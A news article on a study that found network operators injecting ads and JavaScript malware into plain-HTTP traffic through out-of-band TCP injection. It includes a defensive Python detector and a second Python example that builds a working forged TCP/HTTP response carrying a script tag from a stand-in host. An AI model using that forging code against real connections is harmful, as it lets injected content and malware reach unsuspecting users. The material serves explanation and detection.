Three Israeli researchers claim to have uncovered evidence of traffic injection, including malware, taking place at the infrastructural level of network connectivity rather than at the edge ISPs that merely lease capacity on that infrastructure. The primary originators of the injections appear to be China Telecom and China Unicom, two of Asia's largest network operators.

In the paper Website-Targeted False Content Injection by Network Operators [PDF], Gabi Nakibly, Jaime Schcolnik, and Yossi Rubin describe several months spent analysing bidirectional HTTP traffic captured with the netsniff-ng toolkit, and their discovery of packet injection carrying ads and malware. Notably, the technique they observed, out-of-band TCP injection, does not intercept and rewrite packets in transit. The injector instead watches the client's request, builds a forged response segment that fits the connection (same addresses, ports and expected sequence numbers) and sends it so that it reaches the client ahead of the legitimate response, which is left untouched:

‘Our study is based on the observation that the forged traffic is injected in an out-of-band manner: the network operators do not update the network packets in-path, but rather send the forged packets without dropping the legitimate ones. This creates a race between the forged and the legitimate packets as they arrive at the end user. This race can be identified and analyzed. Our analysis shows that the main purpose of content injection is to increase the network operators’ revenue by inserting advertisements to websites. Nonetheless, surprisingly, we have also observed numerous cases of injected malicious content.’
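The race the authors describe leaves a fingerprint in a packet capture: the client sees two data segments on the same connection with the same sequence number but different payloads, and the forged one arrives first. The following is an added example, not code from the paper, of that check run over a hand-constructed capture (the addresses, ports, bodies and TTL values are invented for the illustration). The TTL comparison is a heuristic of this example: an injector sitting in the operator's core is usually fewer hops from the client than the origin server, so its packet tends to arrive with a higher remaining TTL.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Added example: a minimal detector for out-of-band TCP injection.
# Rule: two non-empty segments on one flow with equal seq but different
# payloads mean two senders claimed the same position in the byte stream.
# A true retransmission repeats the same bytes and is not flagged.


@dataclass
class Segment:
    ts: float          # capture timestamp in seconds
    src: str
    sport: int
    dst: str
    dport: int
    seq: int
    ttl: int
    ip_id: int
    payload: bytes


@dataclass
class Finding:
    flow: Tuple[str, int, str, int]
    seq: int
    first: Segment     # won the race: the suspected forgery
    second: Segment    # lost the race: the suspected legitimate reply
    gap_ms: float      # how long the legitimate segment trailed behind
    ttl_delta: int     # first.ttl - second.ttl (heuristic, see lead-in)


def find_injections(segments: List[Segment]) -> List[Finding]:
    """Return one Finding per (flow, seq) that carried conflicting payloads."""
    seen: Dict[Tuple, Segment] = {}
    findings: List[Finding] = []
    for seg in sorted(segments, key=lambda s: s.ts):
        if not seg.payload:
            continue                      # pure ACKs carry nothing to forge
        flow = (seg.src, seg.sport, seg.dst, seg.dport)
        first = seen.setdefault(flow + (seg.seq,), seg)
        if first is seg or first.payload == seg.payload:
            continue                      # first sighting, or honest retransmission
        findings.append(Finding(flow, seg.seq, first, seg,
                                (seg.ts - first.ts) * 1000.0,
                                first.ttl - seg.ttl))
    return findings


# Constructed capture (RFC 5737 documentation addresses, invented timings).
SERVER, CLIENT = "203.0.113.10", "198.51.100.7"
LEGIT_BODY = (b"HTTP/1.1 200 OK\r\nContent-Length: 31\r\n\r\n"
              b"<html><body>hello</body></html>")
INJECTED = b'<script src="http://ads.example/x.js"></script>'
FORGED_BODY = (b"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: %d\r\n\r\n"
               % len(INJECTED)) + INJECTED

SAMPLE_CAPTURE = [
    Segment(0.000, CLIENT, 51000, SERVER, 80, 1000, 64, 7,
            b"GET / HTTP/1.1\r\nHost: www.example\r\n\r\n"),
    # forged reply: same seq the client expects, arrives first, higher TTL
    Segment(0.012, SERVER, 80, CLIENT, 51000, 5000, 55, 0x1234, FORGED_BODY),
    # legitimate reply: same seq, loses the race by 19 ms
    Segment(0.031, SERVER, 80, CLIENT, 51000, 5000, 47, 0x2A1C, LEGIT_BODY),
    # unrelated flow with an honest retransmission (identical payload)
    Segment(1.000, "203.0.113.20", 80, CLIENT, 51001, 9000, 50, 100,
            b"HTTP/1.1 304 Not Modified\r\n\r\n"),
    Segment(1.250, "203.0.113.20", 80, CLIENT, 51001, 9000, 50, 101,
            b"HTTP/1.1 304 Not Modified\r\n\r\n"),
]

if __name__ == "__main__":
    for f in find_injections(SAMPLE_CAPTURE):
        print(f"{f.flow} seq={f.seq}: forged won by {f.gap_ms:.1f} ms, "
              f"ttl delta {f.ttl_delta}, first payload {f.first.payload[:40]!r}")
```

On a real capture the same rule applies per flow; the authors' point is that because the legitimate segment is never dropped, the evidence of the race survives in the trace and can be measured (timing gap, TTL and IP ID differences) rather than inferred.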

The researchers note that HTTPS precludes the kind of attacks detailed in the paper. The reason is integrity rather than key strength: without the session key an on-path injector cannot produce TLS records that pass the client's authentication check, so a forged segment is rejected even if it wins the race. They emphasise also that the injections described here do not originate with edge ISPs, which merely occupy space on the operators' infrastructure, and which may have their own history of trying to monetise users' traffic by interjecting ads into it.

Though advertisement injection predominates in the cases studied, approximately 40% of the injection attempts involved the placement of JavaScript-based malware. In one case the injected JavaScript appended content to the page served under the targeted domain, and in another it prompted the download of an executable file. In one case a domain registered to the Gambling Portal Webmasters Association had content forged in its name that pointed at a similarly-named but otherwise empty domain registered in Romania.

The paper describes the process of forging a TCP segment over an unencrypted connection as ‘trivial’, and the study involved analysis of 1.5 petabytes of data and 1.5 million IP addresses.
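To show why forging is 'trivial' on plain HTTP, here is an added example (not from the paper or the article) that assembles a forged IPv4/TCP response from nothing but the fields visible in the client's own request: the four-tuple, the request's sequence and acknowledgement numbers, and its length. The packet is only built and checked here, never sent. The addresses are RFC 5737 documentation ranges, the request values are invented, and setting FIN on the forged reply is this example's choice, not something the article reports.

```python
import struct

# Added example: build and verify a forged server response for an observed
# plain-HTTP request. Everything the forger needs is copied from the request.


def _ones_complement_sum(data: bytes) -> int:
    """16-bit one's-complement sum with end-around carry (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def checksum(data: bytes) -> int:
    return (~_ones_complement_sum(data)) & 0xFFFF


def ip_bytes(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def forge_response(req: dict, body: bytes, ttl: int = 64) -> bytes:
    """IPv4+TCP segment claiming to be the server's reply to `req`.

    req holds what was seen on the wire: client_ip/port, server_ip/port,
    the request's seq and ack, and its payload length.
    """
    seq = req["ack"]                        # next byte the client expects from the server
    ack = req["seq"] + req["payload_len"]   # acknowledge the whole request
    flags = 0x18 | 0x01                     # PSH|ACK plus FIN (example's choice)
    tcp = struct.pack("!HHIIBBHHH", req["server_port"], req["client_port"],
                      seq, ack, 5 << 4, flags, 65535, 0, 0)
    src, dst = ip_bytes(req["server_ip"]), ip_bytes(req["client_ip"])
    pseudo = src + dst + struct.pack("!BBH", 0, 6, len(tcp) + len(body))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp + body)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(body),
                     0x1234, 0x4000, ttl, 6, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp + body


def verify(packet: bytes) -> dict:
    """Parse the packet back and recompute both checksums (valid when they fold to 0)."""
    ip, tcp = packet[:20], packet[20:]
    _, _, _, _, _, ttl, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", ip)
    _, _, seq, ack, off, flags, _, _, _ = struct.unpack("!HHIIBBHHH", tcp[:20])
    pseudo = src + dst + struct.pack("!BBH", 0, proto, len(tcp))
    return {
        "ip_checksum_ok": checksum(ip) == 0,
        "tcp_checksum_ok": checksum(pseudo + tcp) == 0,
        "seq": seq, "ack": ack, "fin": bool(flags & 0x01), "ttl": ttl,
        "body": tcp[(off >> 4) * 4:],
    }


# Constructed observation of a client request (invented values).
OBSERVED_REQUEST = {
    "client_ip": "198.51.100.7", "client_port": 51000,
    "server_ip": "203.0.113.10", "server_port": 80,
    "seq": 1000, "ack": 5000, "payload_len": 38,
}
INJECTED_BODY = (b"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 47\r\n\r\n"
                 b'<script src="http://ads.example/x.js"></script>')

if __name__ == "__main__":
    pkt = forge_response(OBSERVED_REQUEST, INJECTED_BODY)
    print(len(pkt), "bytes", verify(pkt))
```

No guessing is involved: the sequence and acknowledgement numbers are read straight off the request, which is exactly what an operator with a tap on its own backbone can do for every unencrypted connection it carries.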

The implications of the study, if confirmed, are significant: traffic inspection and forged-packet injection are taking place inside the operators' core networks, the highest vantage point available on any network and one from which every unencrypted connection the operator carries can be targeted.